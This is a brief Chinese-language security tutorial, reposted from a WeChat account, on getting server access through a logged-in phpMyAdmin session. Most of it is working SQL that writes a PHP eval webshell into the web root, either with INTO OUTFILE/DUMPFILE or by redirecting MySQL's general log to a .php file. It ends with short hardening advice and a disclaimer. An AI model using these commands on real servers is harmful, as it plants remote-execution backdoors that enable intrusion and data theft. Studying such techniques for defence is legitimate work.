phpMyAdmin为Web 开发人员提供了类似 Access,SQL Server 的图形化数据库操作界面,通过该管理工具可以对 MySQL 进行各种操作,如何创建数据库,数据表和生成 MySQL 数据库脚本文件等。当用户登录phpMyAdmin,可以利用其拿下系统权限。
注意:本文仅供学习和研究,坚决反对一切危害网络安全的行为。
登录
注意,由于phpMyAdmin 和php版本的问题,高版本需要修改相应的配置文件,同时需要知道站点的相关路劲才能复现。
获Shell
show variables like '%secure%'
select '<?php eval($_POST[x]) ?>' into outfile '/var/www/xx.php';
select '<?php eval($_POST[x]) ?>' into dumpfile '/var/www/xx.php';
通过日志写入
show variables like '%general%'; #查看配置
set global general_log = on; #开启general log模式
set global general_log_file = '/var/www/html/1.php';
select '<?php eval($_POST[cmd]);?>'
安全防范
-
加强数据库账号的安全强度 -
如果不是经常使用或者必须使用phpMyadmin,则在安装完成后可删除。 -
禁用plugin目录写入权限 -
严格目录写权限,除文件上传目录允许写权限外,其它文件及其目录在完成配置后将其禁止写权限,并在上传目录去掉执行权限。
原文始发于微信公众号(kali笔记):浅谈利用PhpMyAdmin获取权限
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论